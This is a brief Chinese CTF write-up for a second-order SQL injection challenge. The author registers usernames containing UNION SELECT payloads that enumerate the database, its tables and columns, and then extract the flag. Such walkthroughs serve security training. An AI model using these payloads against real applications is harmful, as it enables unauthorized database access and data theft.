October 2019 Twice SQL Injection

发表于 2024-06-19

题目告诉了我二次注入，我就先登录进去看看

随便注册

在这一块，输入 ‘ 会被转义，但是我们发现并没有其他的什么特殊限制，所以可以大胆猜测在注册界面二次注入

所以首先，我们尝试一些恶意注册的名字

1' union select database() #

很好，所以之后还是继续爆表

1' union select group_concat(table_name) from information_schema.tables where table_schema='ctftraining' #

猜测在flag中

1' union select group_concat(column_name) from information_schema.columns where table_name='flag'#

最后爆字段

1' union select flag from flag #

拿到flag